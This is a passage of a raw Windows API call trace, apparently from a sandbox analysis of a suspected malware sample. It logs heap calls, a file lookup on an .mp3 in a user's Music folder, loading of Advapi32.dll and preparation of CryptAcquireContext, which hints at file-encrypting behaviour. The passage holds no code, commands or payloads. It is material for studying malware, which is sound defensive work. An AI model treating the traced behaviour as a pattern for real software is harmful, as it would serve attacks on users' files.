(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0117.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0117.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0117.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.328] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542d010, ftCreationTime.dwHighDateTime=0x1d5efed, ftLastAccessTime.dwLowDateTime=0x1323e620, ftLastAccessTime.dwHighDateTime=0x1d5e37b, ftLastWriteTime.dwLowDateTime=0x1323e620, ftLastWriteTime.dwHighDateTime=0x1d5e37b, nFileSizeHigh=0x0, nFileSizeLow=0x65cf, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Glkh.mp3", cAlternateFileName="")) returned 0x41ac200 [0117.328] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.329] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.329] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0117.330] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0117.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0117.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.330] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0117.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0117.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0117.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0117.330] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0117.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.331] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0117.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.332] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0117.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0117.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0117.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0117.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0117.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.332] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0117.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0117.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0117.332] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0117.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0117.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0117.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0117.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0117.333] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.333] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0117.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.334] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0117.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0117.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.334] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0117.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0117.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0117.335] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.335] PeekMessageW (in: lpMsg=0x144e32c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e32c) returned 0 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0117.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0117.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0117.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.336] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", 